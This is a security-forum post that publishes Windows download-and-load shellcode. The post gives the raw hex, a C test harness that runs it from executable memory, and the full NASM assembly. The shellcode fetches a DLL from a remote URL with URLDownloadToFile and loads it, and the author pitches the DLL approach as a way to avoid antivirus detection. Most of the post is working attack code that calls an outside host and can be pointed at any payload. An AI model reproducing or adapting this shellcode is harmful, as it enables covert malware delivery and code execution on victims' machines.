[RST] Shellcode - Download & Load (DLL)

[Nytro]

The idea is simple: you can download an executable file but it can be easily detected. However, the DLLs are NOT detected (most of the time)! So it can be helpful to just download and load a library instead of downloading and executing something. The DLL can contain any code, C or something else, and it is very easy to do anything instead of writing some custom shellcode.

This shellcode should work on Windows XP, Vista, 7, 8. It is 90% based on RubberDuck's "Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode" shellcode available here: http://www.exploit-db.com/exploits/24318/ so all credits go to RubberDuck (Binary Flow)

How it works:

- Find kernel32 address from PEB

- Find GetProcAddress function from kernel32

- Find LoadLibrary function using GetProcAddress

- LoadLibrary("urlmon.dll")

- Find URLDownloadToFile function from urlmon.dll

- URLDownloadToFile("https://rstforums.com/fisiere/dead.dll", "dead.dll")

- LoadLibrary("dead.dll")

- Loop

Shellcode and C program to test it (DETECTABLE):

/*
    Name: Download & Load (DLL) shellcode
    Author: Nytro
    Powered by: Romanian Security Team (https://rstforums.com/forum)
    Based (90%) on RubberDuck's "Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode" 
        shellcode available here: http://www.exploit-db.com/exploits/24318/ 
    Tested on: Windows XP, Windows 7, Windows 8

    The shellcode downloads and loads https://rstforums.com/fisiere/dead.dll.
    The dead.dll library contains a simple MessageBox, but do not trust me, download it and check it yourself. 
*/

#include "stdafx.h"
#include <Windows.h>

int main()
{
    // Our shellcode

    unsigned char shellcode[] =
        "\x31\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B"
        "\x58\x10\x8B\x53\x3C\x01\xDA\x8B\x52\x78\x01\xDA\x8B\x72\x20\x01"
        "\xDE\x31\xC9\x41\xAD\x01\xD8\x81\x38\x47\x65\x74\x50\x0F\x85\xF0"
        "\xFF\xFF\xFF\x81\x78\x04\x72\x6F\x63\x41\x0F\x85\xE3\xFF\xFF\xFF"
        "\x81\x78\x08\x64\x64\x72\x65\x0F\x85\xD6\xFF\xFF\xFF\x8B\x72\x24"
        "\x01\xDE\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x01\xDE\x8B\x14\x8E\x01"
        "\xDA\x31\xC9\x51\x68\x2E\x64\x6C\x6C\x68\x64\x65\x61\x64\x53\x52"
        "\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64"
        "\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x89\x45\xFC\x51\x66\xB9\x6C"
        "\x6C\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD0\x83"
        "\xC4\x10\x8B\x54\x24\x04\x31\xC9\x51\x66\xB9\x65\x41\x51\x31\xC9"
        "\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64\x54\x68\x6F\x77\x6E\x6C\x68"
        "\x55\x52\x4C\x44\x54\x50\xFF\xD2\x31\xC9\x8D\x54\x24\x24\x51\x51"
        "\x52\xEB\x1F\x51\xFF\xD0\x83\xC4\x1C\x31\xC0\x50\x68\x2E\x64\x6C"
        "\x6C\x68\x64\x65\x61\x64\x54\x8B\x45\xFC\xFF\xD0\x90\xE9\xFA\xFF"
        "\xFF\xFF\xE8\xDC\xFF\xFF\xFF"
        "https://rstforums.com/fisiere/dead.dll"
        "\x00";

    LPVOID lpAlloc = NULL;
    void (*pfunc)();

    // Allocate memory (rwx) for shellcode

    lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if(lpAlloc == NULL)
    {
        printf("Memory isn't allocated!\n");
        return 0;
    }

    // Copy

    memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);

    pfunc = (void ())lpAlloc;

    // Execute

    pfunc();

    return 0;
}

The shellcode assembly (NASM):

bits 32

; Find kernel32
; ----------------------------------------------------------

xor ecx,ecx            ; ECX = 0
mov eax,[fs:ecx+0x30]  ; EAX = PEB
mov eax,[eax+0xc]      ; EAX = PEB->Ldr
mov esi,[eax+0x14]     ; ESI = PEB->Ldr.InMemOrder 
lodsd                  ; EAX = Second module
xchg eax,esi           ; EAX = ESI, ESI = EAX
lodsd                  ; EAX = Third (kernel32)
mov ebx,[eax+0x10]     ; EBX = Base address
mov edx,[ebx+0x3c]     ; EDX = DOS->e_lfanew
add edx,ebx            ; EDX = PE Header
mov edx,[edx+0x78]     ; EDX = Offset export table
add edx,ebx            ; EDX = Export table
mov esi,[edx+0x20]     ; ESI = Offset names table
add esi,ebx            ; ESI = Names table
xor ecx,ecx            ; EXC = 0

; Find GetProcAddress
; ----------------------------------------------------------

inc ecx                ; Loop for each function
lodsd
add eax,ebx            ; Loop untill function name

cmp dword [eax],0x50746547        ; GetP
jnz 0x23
cmp dword [eax+0x4],0x41636f72    ; rocA
jnz 0x23
cmp dword [eax+0x8],0x65726464    ; ddre
jnz 0x23

mov esi,[edx+0x24]   ; ESI = Offset ordinals
add esi,ebx          ; ESI = Ordinals table
mov cx,[esi+ecx*2]   ; CX = Number of function
dec ecx              
mov esi,[edx+0x1c]   ; ESI = Offset address table
add esi,ebx          ; ESI = Address table

mov edx,[esi+ecx*4]  ; EDX = Pointer(offset)
add edx,ebx          ; EDX = GetProcAddress

; Find LoadLibrary
; ----------------------------------------------------------

xor ecx,ecx              ; ECX = 0
push ecx
push dword 0x6c6c642e    ; .dll
push dword 0x64616564    ; dead
push ebx                 ; Kernel32 base address
push edx                 ; GetProcAddress
push ecx                 ; 0
push dword 0x41797261    ; aryA
push dword 0x7262694c    ; Libr
push dword 0x64616f4c    ; Load
push esp                 ; "LoadLibrary"
push ebx                 ; Kernel32 base address
call edx                 ; GetProcAddress(LL)

; LoadLibrary("urlmon.dll");
; ----------------------------------------------------------

add esp,byte +0xc      ; pop "LoadLibrary"
pop ecx                ; ECX = 0
push eax               ; EAX = LoadLibrary
mov [ebp-4], eax       ; Backup EAX; Ugly
push ecx
mov cx,0x6c6c          ; ll
push ecx
push dword 0x642e6e6f  ; on.d
push dword 0x6d6c7275  ; urlm
push esp               ; "urlmon.dll"
call eax               ; LoadLibrary("urlmon.dll")

; Get URLDownloadToFile
; ----------------------------------------------------------

add esp,byte +0x10       ; Clean stack
mov edx,[esp+0x4]        ; EDX = GetProcAddress
xor ecx,ecx              ; ECX = 0
push ecx
mov cx,0x4165            ; eA
push ecx
xor ecx,ecx              ; ECX = 0
push dword 0x6c69466f    ; oFil
push dword 0x5464616f    ; oadT
push dword 0x6c6e776f    ; ownl
push dword 0x444c5255    ; URLD
push esp                 ; "URLDownloadToFileA"
push eax                 ; urlmon base address
call edx                 ; GetProc(URLDown)

; Call URLDownloadToFile
; ----------------------------------------------------------

xor ecx,ecx              ; ECX = 0
lea edx,[esp+0x24]       ; EDX = "dead.dll"
push ecx
push ecx
push edx                 ; "dead.dll"
jmp short 0xF2           ; Will see
push ecx                 ; 0 
call eax                 ; Download

; Call LoadLibrary
; ----------------------------------------------------------

add esp, byte +0x1c        ; Clean stack (URL...)

xor eax, eax             ; NULL
push eax
push dword 0x6c6c642e    ; .dll
push dword 0x64616564    ; dead
push esp

mov eax, [ebp-4]           ; I know, this sucks
call eax                   ; LoadLibrary
nop
jmp 0xEC                   ; Fuckin' loop

; Will put URL pointer on the stack as return address (call)

call dword 0xD3

url db "https://rstforums.com/fisiere/dead.dll", 0

Important Note!

It may not work on all Windows 7 & Windows 8 operating systems due to some stupidities related to the Internet Explorer settings! For example, on some Windows 8 versions the URLDownloadToFile didn't work until IE was the default browser. On some Windows 7 versions it didn't work until the IE settings were reset, but it worked even if IE was not the default browser. The problem is with URLDownloadToFile, not with the shellcode.

If you have any questions, you can ask me here.

Thanks,

Nytro

Edited August 6, 2014 by Nytro